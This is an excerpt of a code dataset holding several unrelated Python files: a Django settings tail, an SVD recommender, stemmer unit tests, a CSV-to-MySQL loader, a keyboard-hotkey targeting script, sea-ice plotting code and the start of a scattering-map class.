GlobalReader(os.path.join(MINV_CONFIG_DIR, 'minv.conf'))\nDATABASES = {\n    'default': {\n        'ENGINE': 'django.contrib.gis.db.backends.postgis',\n        'HOST': reader.host,\n        'PORT': reader.port,\n        'NAME': reader.database,\n        'USER': reader.user,\n        'PASSWORD': reader.password\n    }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.7/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nDATETIME_FORMAT = 'c'\n\nSHORT_DATETIME_FORMAT = 'c'\n\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.7/howto/static-files/\n\nSTATIC_URL = '/minv_static/'\nSTATIC_ROOT = os.path.join(BASE_DIR, 'static')\n\n\nLOGIN_URL = '/login'\n\n\nLOGGING = {\n    'version': 1,\n    'disable_existing_loggers': False,\n    'formatters': {\n        'simple': {\n            'format': '%(levelname)s: %(message)s'\n        },\n        'verbose': {\n            'format': '[%(asctime)s][%(module)s] %(levelname)s: %(message)s'\n        }\n    },\n    'handlers': {\n        'file': {\n            'level': reader.log_level,\n            'formatter': 'verbose',\n            'class': 'logging.handlers.WatchedFileHandler',\n            'filename': '/var/log/minv/minv.log',\n        },\n        'django_file': {\n            'level': reader.log_level,\n            'class': 'logging.handlers.WatchedFileHandler',\n            'filename': '/var/log/minv/django.log',\n        },\n    },\n    'loggers': {\n        'django': {\n            'handlers': ['django_file'],\n            'level': reader.log_level,\n            'propagate': True,\n        },\n        'minv': {\n            'handlers': ['file'],\n            'level': reader.log_level,\n            'propagate': True,\n        },\n    },\n}\n","sub_path":"minv/instance_template/project_name/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":5370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"392749136","text":"import random\nimport pandas as pd\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport scipy.sparse as sp\nimport torch.utils.data as data\nfrom tqdm import tqdm\nfrom utils import Interactions\nimport os\nfrom sklearn import preprocessing\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.utils.extmath import randomized_svd\n\n# whether to use implicit feedback\nIMPLICT=False\n# whether to test on a tiny subset of the data\nSMALL=False\n\n# for reproducibility\ndef seed_everything(seed=1234):\n    random.seed(seed)\n    os.environ['PYTHONHASHSEED'] = str(seed)\n    np.random.seed(seed)\n    torch.manual_seed(seed)\n    torch.cuda.manual_seed(seed)\n    torch.backends.cudnn.deterministic = True\nseed_everything()\n\n# To compute probabilities\ndef sigmoid(x):\n    return 1 / (1 + np.exp(-x))\n\n# build the dataloaders: read the data and wrap it with Interactions, a pytorch sampler that yields the (u, i, r) triples of the dataframe; see utils.py for details\ndef getDataLoader(data_path, batch_size=2048):\n    # load train data\n    data_fields = ['user_id', 'item_id', 'rating', 'timestamp']\n    # all data file\n    data_df = pd.read_table(data_path, names=data_fields)\n    if SMALL:\n        data_df = data_df.sample(n=int(len(data_df) * 0.1), replace=False)\n    if IMPLICT:\n        data_df.rating = (data_df.rating >= 5).astype(np.float32)\n\n    # encode the raw ids as contiguous integers\n    le = preprocessing.LabelEncoder()\n    le.fit(data_df['user_id'])\n    data_df['user_id']=le.transform(data_df['user_id'])\n    le.fit(data_df['item_id'])\n    data_df['item_id']=le.transform(data_df['item_id'])\n\n    df_train = data_df.sample(n=int(len(data_df) * 0.8), replace=False)\n    df_test = data_df.drop(df_train.index, axis=0)\n\n    # get user number\n    n_users = max(data_df['user_id'].values)+1\n    # get item number\n    n_items = max(data_df['item_id'].values)+1\n\n    print(\"Initialization finished. The user 
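The LabelEncoder step above re-maps arbitrary user and item ids onto a dense 0..n-1 range, which the matrix construction later in this record relies on; for instance (sketch):

from sklearn import preprocessing

le = preprocessing.LabelEncoder()
le.fit([900, 3, 900, 42])
print(list(le.transform([3, 42, 900])))  # [0, 1, 2] -- contiguous ids from 0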
number is: %d, item number is: %d\" % (n_users, n_items))\n    train_loader = data.DataLoader(\n        Interactions(df_train), batch_size=batch_size, shuffle=True)\n\n    test_loader = data.DataLoader(\n        Interactions(df_test), batch_size=batch_size, shuffle=False)\n\n    loaders = {'train': train_loader,\n               'valid': test_loader}\n\n    return (n_users,n_items ), loaders\n\n#\nclass SVD(torch.nn.Module):\n    def __init__(self, n_users, n_items, n_factors=80,topn=10, sparse=False, device=torch.device(\"cpu\")):\n        super(SVD, self).__init__()\n\n        self.n_users = n_users\n        self.n_items = n_items\n        self.device = device\n        self.topn = topn\n        # get factor number\n        self.n_factors = n_factors\n        self.user_vec=None\n        self.item_vec=None\n        self.to(self.device)\n\n    def _convert_df(self, user_num, item_num, df):\n        ratings = list(df['rating'])\n        rows = list(df['user_id'])\n        cols = list(df['item_id'])\n        mat = sp.csr_matrix((ratings, (rows, cols)), shape=(user_num, item_num))\n\n        return mat\n\n    def fit(self,loaders):\n        # load train data\n        data_fields = ['user_id', 'item_id', 'rating', 'timestamp']\n        # all data file\n        data_path=\"u.data\"\n        data_df = pd.read_table(data_path, names=data_fields)\n        print(\" SVD START\")\n        train_set = self._convert_df(self.n_users, self.n_items, data_df)\n        U, sigma, Vt = randomized_svd(train_set,\n                                      n_components=self.n_factors,\n                                      random_state=2020)\n        s_Vt = sp.diags(sigma) * Vt\n        print('SVD END')\n        self.user_vec = U\n        self.item_vec = s_Vt.T\n\n    def predict(self, u, i):\n        return self.user_vec[u, :].dot(self.item_vec[i, :])\n\n\nif __name__ == '__main__':\n    input_size, loader=getDataLoader(\"u.data\")\n    # getDataLoader returns the sizes the model needs for initialization, i.e. the user and item counts\n    model = SVD(input_size[0],input_size[1])\n    model.fit(loader)\n","sub_path":"ch3/svd.py","file_name":"svd.py","file_ext":"py","file_size_in_byte":3882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"530715384","text":"import unittest\nfrom stemmer import Stemmer\nfrom tokenizer import Token, Tokenizer\n\n\nclass MyTestCase(unittest.TestCase):\n    def test_something(self):\n        self.assertEqual(True, True)\n\n    def test_stemmer(self):\n        line = \"мамочка свари суп\"\n        #tok = Tokenizer().tokenize_alph(line)\n\n        fact = list(Stemmer().stem(Token(0, 7, line, 'a'), 4, line))\n\n        check = [Token(0, 7, line, 'a'), Token(0, 6, line, 'a'),\n                 Token(0, 5, line, 'a'), Token(0, 4, line, 'a'), Token(0, 3, line, \"a\")]\n\n        fact1 = list(Stemmer().stem(Token(14, 17, line, \"a\"), 4, line))\n        check1 = [Token(14, 17, line, \"a\")]\n\n        self.assertEqual(fact, check)\n        self.assertEqual(fact1, check1)\n\n    def test_stemmer_flex(self): \n\n        line = \"мамочка свари суп\"\n\n        fact = list(Stemmer().stem_flex(Token(0, 8, \"мамочка свари суп\", \"a\")))\n        check = [Token(0, 8, line, 'a'), Token(0, 7, line, 'a')]\n\n        self.assertEqual(fact, check)\n\n\nif __name__ == '__main__':\n    unittest.main()\n","sub_path":"test_stemmer.py","file_name":"test_stemmer.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"252254706","text":"# -*- coding: utf-8 -*-\nimport settings\nfrom mysql import db\nimport os, time\nimport csv\nimport re\nimport sfhd_origin_data_extract\nclass data_to_mysql():\n    def __init__(self):\n        pass\n\n\n\n    def get_time(self, file_name):\n        # file_name = \"sfhd_origin_20160501.csv\"\n        t = re.sub(\"\\D\", \"\", file_name)\n        print(t)\n        s = t[0:4] + \"-\" + t[4:6] + \"-\" + t[6:] + \" 00:00:00\"\n        st = int(time.mktime(time.strptime(s, \"%Y-%m-%d 
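get_time, continued below, derives a day's epoch bounds from the digits embedded in the file name; the same arithmetic in isolation (a sketch, assuming the local time zone has no DST shift on that date):

import re, time

digits = re.sub(r"\D", "", "sfhd_origin_20160501.csv")         # "20160501"
day = "{}-{}-{}".format(digits[0:4], digits[4:6], digits[6:])  # "2016-05-01"
start = int(time.mktime(time.strptime(day + " 00:00:00", "%Y-%m-%d %H:%M:%S")))
end = int(time.mktime(time.strptime(day + " 23:59:59", "%Y-%m-%d %H:%M:%S")))
assert end - start == 86399                                    # one day minus one second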
%H:%M:%S\")))\n        # print(st)\n        e = t[0:4] + \"-\" + t[4:6] + \"-\" + t[6:] + \" 23:59:59\"\n        et = int(time.mktime(time.strptime(e, \"%Y-%m-%d %H:%M:%S\")))\n        # print(et)\n        # the return values are INT epoch seconds\n        return st, et\n\n    # store the rows of a CSV file into MySQL\n    def data_stored_mysql(self, file_name, table_name):\n        csvfile = open(file_name, 'r')\n        dict_reader = csv.DictReader(csvfile)\n        db.connect()\n        datas = []\n        freq = 0\n        for row in dict_reader:\n            row = dict(row)\n            # create the table on the first pass\n            columns = []\n            for i in row.keys():\n                columns.append(i)\n            if (db.is_table_exist(table_name, settings.database) == None and freq == 0):\n                db.create_table(table_name, columns)\n                freq += 1\n                print(\"create is ok\")\n            else:\n                pass\n            # insert the row data\n            # row['time'] = int(time.mktime(time.strptime(row['time'], '%Y-%m-%d %H:%M:%S')))\n            row['time'] = int(row['time'])\n            datas.append(row)\n        db.insert_mysql_with_json(table_name, datas)\n        print(\"insert is ok\")\n        db.disconnect()\n\n    # store every file in the directory into MySQL\n    def main_storeto_mysql(self, file_dir, table_name):\n        file_names = []\n        for root, dirs, files in os.walk(file_dir):\n            fs = time.time()\n            # i = 1\n            for f in files:\n                # if i <= 3 :\n                fs_1 = time.time()\n                file = \"/home/grid/sparktest/task_mysql/sfhd_origin_data/\" + f\n                # call data_stored_mysql to push this file into MySQL\n                self.data_stored_mysql(file, table_name)\n                fs_2 = time.time()\n                print(\"stored %s, elapsed: %s \" % (f, fs_2 - fs_1))\n                # i+=1\n\n            fe = time.time()\n            print(\"total time to store into MySQL:\", fe - fs)\n        # pass\n\n    def main_storeto_CSV(self, file_dir, table_name):\n\n        for root, dirs, files in os.walk(file_dir):\n\n            fs = time.time()\n            # i =1\n\n            for file in files:\n                # if i <= 3:\n                fe_1 = time.time()\n                st, et = self.get_time(file)\n                print(st, et)\n                sfhd_origin_data_extract.time_main(st, et, table_name)\n                fe_2 = time.time()\n\n                print(\"time to store %s: %s\" % (file, fe_2 - fe_1))\n                # i+=1\n                # print(i)\n        # store three times\n\n            fe = time.time()\n            print(\"total time to store CSV:\", (fe - fs))\n\n\nif __name__ == \"__main__\":\n    table_name = \"originDataMonth_test_11_13\"\n    dtm = data_to_mysql()\n    # dtm.main_storeto_mysql(\"/home/grid/sparktest/task_mysql/sfhd_origin_data\", table_name)\n    dtm.main_storeto_CSV(\"/home/grid/sparktest/task_mysql/sfhd_origin_data\", table_name)","sub_path":"sparktest/task_mysql/data_to_mysql_11_7.py","file_name":"data_to_mysql_11_7.py","file_ext":"py","file_size_in_byte":3357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"170183935","text":"import keyboard\nimport pywinauto as p\nfrom time import sleep\nimport os\nimport sys\n\ncurrentdir = os.path.dirname(os.path.realpath(__file__))\nparentdir = os.path.dirname(currentdir)\nsys.path.append(parentdir)\n\nimport mouse.mouseSeal as mouse\n\nprint(\"autolock.py\")\ninventory = []\nk = p.keyboard\ntarget = 0\n\nwhile True:\n    if keyboard.is_pressed(\"-\") :\n        print(\"setting target\")\n        sleep(0.3)\n        mouse.setTarget(target)\n    if keyboard.is_pressed(\"/\") :\n        target = mouse.getCurrentTarget()\n        print(\"Target Locked\")\n        mouse.setTarget(mouse.getCurrentTarget())\n    sleep(0.2)","sub_path":"autolock.py","file_name":"autolock.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"383367735","text":"# -------------------------------------------------------------------------------\n# modules\n#\nimport xarray as xr\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport cartopy.crs as ccrs\nimport matplotlib.gridspec as gridspec\nimport cmcrameri.cm as cmc\nfrom matplotlib.colors import BoundaryNorm, 
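data_stored_mysql above casts row['time'] to int because csv.DictReader yields every field as a string; a tiny demonstration (sketch):

import csv, io

rows = csv.DictReader(io.StringIO("time,value\n1478000000,3\n"))
for row in rows:
    print(dict(row))         # {'time': '1478000000', 'value': '3'}
    print(int(row['time']))  # 1478000000 -- hence the explicit cast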
LinearSegmentedColormap\nimport matplotlib\n\nfont = {'size': 12}\nmatplotlib.rc('font', **font)\n\ndef drywet(numcolors, colormap):\n\n colors_blue = colormap(np.linspace(0.5, 1, 5))\n colors_white = np.array([1, 1, 1, 1])\n colors_brown = [[84, 48, 5, 255],\n [140, 81, 10, 255],\n [191, 129, 45, 255],\n [223, 194, 125, 255],\n [246, 232, 195, 255]]\n rgb = []\n for i in range(len(colors_brown)):\n z = [x / 255 for x in colors_brown[i]]\n rgb.append(z)\n colors = np.vstack((rgb, colors_white, colors_blue))\n\n cmap = LinearSegmentedColormap.from_list(name=colormap, colors=colors, N=numcolors)\n\n return cmap\n\n# -------------------------------------------------------------------------------\n# read data\n# %%\nvar_name = 'FR_SEA_ICE'\n\nsims = ['new', 'old', 'diff']\nfriac = {}\nlabels = {'new': 'Sea Ice update', 'old': 'Sea Ice static', 'diff': 'Difference between versions'}\n\nfor s in range(len(sims)):\n sim = sims[s]\n friac[sim] = {}\n friac[sim]['label'] = labels[sim]\n data = xr.open_dataset(f'{sim}_version.nc')\n dt = data[var_name].values[0, :, :]\n friac[sim][var_name] = dt\n# %%\nlat = xr.open_dataset('old_version.nc')['lat'].values[:]\nlon = xr.open_dataset('old_version.nc')['lon'].values[:]\nlat_, lon_ = np.meshgrid(lon, lat)\nprint(\"load done\")\n# -------------------------------------------------------------------------------\n# plot\n# %%\nar = 1.0 # initial aspect ratio for first trial\nwi = 12 # height in inches #15\nhi = 2.5 # width in inches #10\nncol = 3 # edit here\nnrow = 1\naxs, cs, gl = np.empty(shape=(nrow, ncol), dtype='object'), np.empty(shape=(nrow, ncol), dtype='object'), np.empty(shape=(nrow, ncol), dtype='object')\n\ncmap1 = cmc.davos_r\nlevels1 = np.linspace(0, 100, 21, endpoint=True)\nnorm1 = BoundaryNorm(levels1, ncolors=cmap1.N, clip=True)\n\ncmap2 = drywet(25, cmc.vik_r)\nlevels2 = np.linspace(0, 40, 11, endpoint=True)\nnorm2 = BoundaryNorm(levels2, ncolors=cmap2.N, clip=True)\n\n# change here the lat and lon\nmap_ext = [-50, 50, 40, 90]\n\nfig = plt.figure(figsize=(wi, hi))\nleft, bottom, right, top = 0.07, 0.01, 0.94, 0.95\ngs = gridspec.GridSpec(nrows=1, ncols=3, left=left, bottom=bottom, right=right, top=top,\n wspace=0.1, hspace=0.15)\n\nfor i in range(3):\n sim = sims[i]\n label = friac[sim]['label']\n axs[0, i] = fig.add_subplot(gs[0, i], projection=ccrs.PlateCarree())\n axs[0, i].set_extent(map_ext, crs=ccrs.PlateCarree())\n axs[0, i].coastlines(zorder=3)\n axs[0, i].stock_img()\n gl[0, i] = axs[0, i].gridlines(crs=ccrs.PlateCarree(), draw_labels=True, x_inline=False, y_inline=False, linewidth=1, color='grey', alpha=0.5, linestyle='--')\n gl[0, i].right_labels = False\n gl[0, i].top_labels = False\n gl[0, i].left_labels = False\n cs[0, i] = axs[0, i].pcolormesh(lon, lat, friac[sim][var_name], cmap=cmap1, norm=norm1, shading=\"auto\",\n transform=ccrs.PlateCarree())\n axs[0, i].set_title(f'{label}', fontweight='bold', pad=6, fontsize=14, loc='center')\n\ngl[0, 0].left_labels = True\n\ncax = fig.add_axes(\n [axs[0, 2].get_position().x1 + 0.01, axs[0, 2].get_position().y0, 0.01, axs[0, 2].get_position().height])\ncbar = fig.colorbar(cs[0, 1], cax=cax, orientation='vertical',\n ticks=np.linspace(0, 100, 6, endpoint=True))\ncbar.ax.tick_params(labelsize=14)\n\n\naxs[0, 0].text(-0.2, 0.5, 'Sea ice', ha='center', va='center', rotation='vertical',\n transform=axs[0, 0].transAxes, fontsize=14, fontweight='bold')\naxs[0, 2].text(1.07, 1.09, '[%]', ha='center', va='center', rotation='horizontal',\n transform=axs[0, 2].transAxes, 
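The drywet() helper at the top of this record stitches browns, white, and blues into one diverging colormap; a quick probe of the result (sketch; run inside the same module so drywet is in scope):

import numpy as np
import cmcrameri.cm as cmc

cmap = drywet(25, cmc.vik_r)
print(np.round(cmap(0.0), 2))  # brown-ish RGBA at the dry end
print(np.round(cmap(1.0), 2))  # blue-ish RGBA at the wet end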
fontsize=12)\n\nfig.show()\n# plotpath = \"/project/pr133/rxiang/figure/echam5/\"\n# fig.savefig(plotpath + 'friac' + f'{mon}.png', dpi=500)\nplt.close(fig)\n\"\"\"\nimport cartopy.crs as ccrs\nimport cartopy.feature as cfeature\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nimport matplotlib.ticker as mticker\nimport numpy as np\nfrom netCDF4 import Dataset\nimport mplotutils as mpu\nimport xarray as xr\nfrom matplotlib.colors import TwoSlopeNorm\n\n\n\ndef plot(filename, field, title, metric, lon, lat, max=None, min=None, \n lat_pole=90, lon_pole=-180, coastline=True, colormap=\"RdBu_r\", \n centered_bar=False): \n\n rotated_pole = ccrs.RotatedPole(pole_latitude=lat_pole, pole_longitude=lon_pole)\n data_crs = ccrs.PlateCarree()\n\n # create the plot and set the size\n plt.figure(figsize=(20,10))\n axes = plt.axes(projection= rotated_pole)\n\n\n # create country's borders and landsea mask\n #land_50m = cfeature.NaturalEarthFeature('cultural', 'admin_0_countries', '50m', edgecolor='black', facecolor='none', linewidth=0.2)\n broder_50m = cfeature.NaturalEarthFeature('physical', 'coastline', '50m', edgecolor='black', facecolor='none', linewidth=0.8)\n if max is None:\n max = np.nanmax(field)\n if min is None:\n min = np.nanmin(field)\n # activate the labels and set countour of the countourf\n draw_labels = True\n reversed_cmap = False\n levels = np.arange(min, max, 0.05)\n color_map = plt.cm.get_cmap(colormap)\n if reversed_cmap:\n reversed_color_map = color_map.reversed()\n else:\n reversed_color_map = color_map\n plt.gca().set_facecolor(\"dimgrey\")\n\n if centered_bar:\n norm = TwoSlopeNorm(vmin=min, vmax=max, vcenter=0.0001)\n # plot in each subplot\n h = plt.contourf(lon, lat, field[:,:], levels=levels, cmap=reversed_color_map, extend='both', norm=norm)\n else:\n h = plt.contourf(lon, lat, field[:,:], levels=levels, cmap=reversed_color_map , extend='both')\n axes.set_title(title, fontsize=25, weight=\"bold\")\n\n ## add borders and landsea mask\n #axes.add_feature(land_50m)\n if coastline:\n axes.add_feature(broder_50m)\n \n gl = axes.gridlines(color='black', linestyle='--', linewidth=1., alpha=0.35, draw_labels=draw_labels, dms=True, x_inline=False, y_inline=False)\n gl.ylocator = mticker.FixedLocator(np.arange(-60, 80, 10))\n gl.xlocator = mticker.FixedLocator(np.arange(-100, 90 ,10))\n gl.xlabel_style = {'size':12, 'rotation': 0, 'rotation_mode': 'anchor'}\n gl.ylabel_style = {'size':12, 'rotation': 0, 'rotation_mode': 'anchor'}\n gl.top_labels = False\n gl.right_labels = False\n gl.left_labels = False\n gl.bottom_labels = True\n gl.left_labels = True\n\n #set colorbar\n cb = plt.colorbar(orientation=\"horizontal\", shrink=0.4, pad=0.07, format=\"%.2f\")\n cb.ax.tick_params(labelsize=14)\n cb.set_label(label= str(metric),fontsize=20)\n\n plt.tight_layout()\n plt.savefig(str(filename) + \".png\")\n \n# create var wherre to store others\nresult = np.zeros((1,224,544))\n\n\nera5_old = xr.open_dataset(\"old_version.nc\")\nera5_new = xr.open_dataset(\"new_version.nc\")\ntas = xr.open_dataset(\"ts_delta.nc\")\ntos = xr.open_dataset(\"tos_delta.nc\")\n\n\nlon = tos.variables['lon'][:]\nlat = tos.variables['lat'][:]\nmonth = 0\nprint(\"loads done\")\nplot(\"old_final_temp\", era5_old.variables['T_SKIN'][0,:,:].values, \"Final PGW Temperature w/o sea ice update\", \n \"T_SKIN [K]\", lon, lat)\nprint(\"1 done\")\nplot(\"new_final_temp\", era5_new.variables['T_SKIN'][0,:,:].values, \"Final PGW Temperature with sea ice update\", \n \"T_SKIN [K]\", lon, lat)\nprint(\"2 
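The disabled plot() helper above centers its diverging colorbar with TwoSlopeNorm; what that normalization does, in isolation (sketch):

from matplotlib.colors import TwoSlopeNorm

norm = TwoSlopeNorm(vmin=-2.0, vcenter=0.0, vmax=5.0)
print(norm(-2.0), norm(0.0), norm(5.0))  # 0.0 0.5 1.0 -- vcenter lands on the colormap midpoint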
done\")\nplot(\"old_final_sic\", era5_old.variables['FR_SEA_ICE'][0,:,:].values, \"ERA5 Sea Ice\", \n \"Sea Ice frac [1]\", lon, lat)\nprint(\"3 done\")\nplot(\"new_final_sic\", era5_new.variables['FR_SEA_ICE'][0,:,:].values, \"PGW Sea Ice\", \n \"Sea Ice frac [1]\", lon, lat)\nprint(\"4 done\")\n\nplot(\"diff_winter\", result - tas.variables['tas'][month,:,:].values,\"Differences between new and previous PGW versions for January\", \n \"TAS delta [K]\",lon,lat )\nplot(\"tas_winter\"+addon, tas.variables['tas'][month,:,:].values, \"TAS field from previous PGW version for January\", \n \"TAS delta [K]\",lon,lat )\n\nplot (\"cdo_winter\"+addon, cdo.variables['tos'][month,:,:].values, \"SST field from bi-linear interpolation for January\", \n \"SST delta [K]\",lon,lat )\nplot (\"sst\"+addon, tos.variables['sst'][month,:,:].values, \"SST field from NaN-ignoring interpolation using kernel interp for January\", \n \"SST delta [K]\" ,lon,lat)\n\nplot (\"sst_tas_diff\"+addon, tos.variables['sst'][month,:,:].values- tas.variables['tas'][month,:,:].values, \"Differences between SST and TAS for January\", \n \"SST delta [K]\",lon,lat)\nplot (\"ice\"+addon, era5.variables['FR_SEA_ICE'][0,:,:].values, \"Sea ice fraction from ERA5 for January\", \n \"Ice fraction [%]\",lon,lat, colormap=\"Blues\")\nlon = christoph.variables['lon'][:]\nlat = christoph.variables['lat'][:]\nprint(np.sum(christoph.variables['ts'][0,:,:].values))\nprint(np.sum(christoph.variables['ts'][0,:,:].values)/ (len(lon)*len(lat)))\nplot (\"heim\", christoph.variables['ts'][0,:,:].values, \"Differences between TS and SST for January\", \n \"Temperature [K]\",lon,lat)\n\n\ndef plot_paper(filename, field, title, metric, max=None, min=None, lat_pole=90, lon_pole=-180, \n coastline=True, colormap=\"RdBu_r\"): \n\n rotated_pole = ccrs.RotatedPole(pole_latitude = lat_pole, pole_longitude = lon_pole)\n data_crs = ccrs.PlateCarree()\n \n # create the plot and set the size\n fig, axs = plt.subplots(1,3, sharex=True, sharey=True , subplot_kw=dict(projection= rotated_pole), figsize = (20*3,10))\n fig.subplots_adjust( wspace=0.05, left=0.05, right=0.99, bottom=0.12, top=0.92)\n #fig.suptitle(r'$\\Delta$'+ \"SST comparison between native GCM data, bi-linear interpolation \\n and NaN-ignoring interpolation\", fontsize=30, weight=\"bold\")\n\n # create country's borders and landsea mask\n #land_50m = cfeature.NaturalEarthFeature('cultural', 'admin_0_countries', '50m', edgecolor='black', facecolor='none', linewidth=0.2)\n broder_50m = cfeature.NaturalEarthFeature('physical', 'coastline', '50m', edgecolor='black', facecolor='none', linewidth=0.8)\n if max == None:\n max = np.nanmax(field)\n if min == None:\n min = np.nanmin(field)\n # activate the labels and set countour of the countourf\n draw_labels = True\n reversed_cmap = False\n levels = np.arange(min, max, 0.05)\n color_map = plt.cm.get_cmap(\"Reds\")\n if reversed_cmap == True:\n reversed_color_map = color_map.reversed()\n else:\n reversed_color_map = color_map\n #plt.gca().set_facecolor(\"dimgrey\")\n #norm = TwoSlopeNorm(vmin=min, vmax = max, vcenter=0.0001)\n origin_dim = raw_sst.coords['longitude'].values.shape\n lon_raw = raw_sst.coords['longitude'].values.reshape(-1)\n for i in range(len(lon_raw)):\n if lon_raw[i] > 180:\n lon_raw[i] -= 360 \n # plot in each subplot\n h1 = axs[0].contourf(lon_raw.reshape(origin_dim), raw_sst.coords['latitude'].values, raw_sst.variables['tos'][month,:,:].values, levels=levels, cmap=reversed_color_map , extend='both')\n axs[0].set_title(r'$\\Delta$SST on 
GCM ocean model grid', fontsize=25, weight=\"bold\")\n    ## add borders and landsea mask\n    #axes.add_feature(land_50m)\n    if coastline:\n        axs[0].add_feature(broder_50m)\n    \n    gl = axs[0].gridlines(color='black', linestyle='--', linewidth=1., alpha=0.35, draw_labels=draw_labels, dms=True, x_inline=False, y_inline=False)\n    gl.ylocator = mticker.FixedLocator(np.arange(-60, 80, 10))\n    gl.xlocator = mticker.FixedLocator(np.arange(-100, 90 ,10))\n    gl.xlabel_style = {'size':12, 'rotation': 0, 'rotation_mode': 'anchor'}\n    gl.ylabel_style = {'size':12, 'rotation': 0, 'rotation_mode': 'anchor'}\n    gl.top_labels = False\n    gl.right_labels = False\n    gl.left_labels = False\n    gl.bottom_labels = True\n    gl.left_labels = True\n    \n    # plot in each subplot\n    h = axs[1].contourf(lon[210:-150], lat[30:-115], cdo.variables['tos'][month,:,:].values[30:-115,210:-150], levels=levels, cmap=reversed_color_map , extend='both')\n    axs[1].set_title(r'$\\Delta$'+ \"SST using bi-linear interpolation\", fontsize=25, weight=\"bold\")\n    ## add borders and landsea mask\n    #axes.add_feature(land_50m)\n    if coastline:\n        axs[1].add_feature(broder_50m)\n    \n    gl = axs[1].gridlines(color='black', linestyle='--', linewidth=1., alpha=0.35, draw_labels=draw_labels, dms=True, x_inline=False, y_inline=False)\n    gl.ylocator = mticker.FixedLocator(np.arange(-60, 80, 10))\n    gl.xlocator = mticker.FixedLocator(np.arange(-100, 90 ,10))\n    gl.xlabel_style = {'size':12, 'rotation': 0, 'rotation_mode': 'anchor'}\n    gl.ylabel_style = {'size':12, 'rotation': 0, 'rotation_mode': 'anchor'}\n    gl.top_labels = False\n    gl.right_labels = False\n    gl.left_labels = False\n    gl.bottom_labels = True\n    gl.left_labels = True\n\n    # plot in each subplot\n    h = axs[2].contourf(lon[210:-150], lat[30:-115], tos.variables['sst'][month,:,:].values[30:-115,210:-150], levels=levels, cmap=reversed_color_map , extend='both')\n    axs[2].set_title(r'$\\Delta$'+ \"SST using NaN-ignoring interpolation\", fontsize=25, weight=\"bold\")\n    ## add borders and landsea mask\n    #axes.add_feature(land_50m)\n    if coastline:\n        axs[2].add_feature(broder_50m)\n    \n    gl = axs[2].gridlines(color='black', linestyle='--', linewidth=1., alpha=0.35, draw_labels=draw_labels, dms=True, x_inline=False, y_inline=False)\n    gl.ylocator = mticker.FixedLocator(np.arange(-60, 80, 10))\n    gl.xlocator = mticker.FixedLocator(np.arange(-100, 90 ,10))\n    gl.xlabel_style = {'size':12, 'rotation': 0, 'rotation_mode': 'anchor'}\n    gl.ylabel_style = {'size':12, 'rotation': 0, 'rotation_mode': 'anchor'}\n    gl.top_labels = False\n    gl.right_labels = False\n    gl.left_labels = False\n    gl.bottom_labels = True\n    gl.left_labels = True    \n\n    #set colorbar\n    cb = mpu.colorbar(h1, axs[1], orientation = 'horizontal', pad = 0.15, aspect=50, format='%.1f') \n    cb.ax.tick_params(labelsize=14)\n    cb.set_label(label=\"SST delta [K]\",fontsize=20)\n\n    #plt.tight_layout()\n    plt.savefig(str(filename) + \".png\")\n\n#plot_paper(\"jonas_figure\"+addon, raw_sst.variables['tos'][month,:,:].values, \"Combined TAS field from NaN-ignoring interpolation for January\", \n#            \"TAS delta [K]\")\n\"\"\"\n","sub_path":"fields/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":14422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"627265760","text":"from __future__ import division\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nk = 3.0\nxf = 1.2#position of the fixed point\nxb = 1.0\ne2 = k * xf * (np.exp(-8 * xb * (2 * xf - xb)) / (1 - np.exp(-32 * xf * xb)))\niterate = 2\nlegendswitch = True#toggle the legend display\ndmap = 
plt.get_cmap(\"tab10\")\n\ndef interpolated_intercepts(x, y1, y2):\n    \"\"\"Find the intercepts of two curves, given by the same x data\"\"\"\n    \n    def intercept(point1, point2, point3, point4):\n        \"\"\"find the intersection between two lines\n        the first line is defined by the line between point1 and point2\n        the second line is defined by the line between point3 and point4\n        each point is an (x,y) tuple.\n        \n        So, for example, you can find the intersection between\n        intercept((0,0), (1,1), (0,1), (1,0)) = (0.5, 0.5)\n        \n        Returns: the intercept, in (x,y) format\n        \"\"\"\n        \n        def line(p1, p2):\n            A = (p1[1] - p2[1])\n            B = (p2[0] - p1[0])\n            C = (p1[0]*p2[1] - p2[0]*p1[1])\n            return A, B, -C\n        \n        def intersection(L1, L2):\n            D = L1[0] * L2[1] - L1[1] * L2[0]\n            Dx = L1[2] * L2[1] - L1[1] * L2[2]\n            Dy = L1[0] * L2[2] - L1[2] * L2[0]\n            \n            x = Dx / D\n            y = Dy / D\n            return x,y\n        \n        L1 = line([point1[0],point1[1]], [point2[0],point2[1]])\n        L2 = line([point3[0],point3[1]], [point4[0],point4[1]])\n        \n        R = intersection(L1, L2)\n        \n        return R\n\n    idxs = np.argwhere(np.diff(np.sign(y1 - y2)) != 0)\n\n    xcs = []\n    ycs = []\n\n    for idx in idxs:\n        xc, yc = intercept((x[idx], y1[idx]),((x[idx+1], y1[idx+1])), ((x[idx], y2[idx])), ((x[idx+1], y2[idx+1])))\n        xcs.append(xc)\n        ycs.append(yc)\n    return np.array(xcs), np.array(ycs)\n\n\n\nclass KScatteringMap:\n    def __init__(self,k,xf,xb):\n        self.k = k\n        self.xf = xf\n        self.xb = xb\n    def ScattMapt(self,qp,step):\n        for i in range(step):\n            qp[0],qp[1] = self.U(qp)\n        return qp[0],qp[1]\n    \n    #map in the positive time direction\n    def U(self,qp):\n        return np.array([qp[0] + qp[1] - 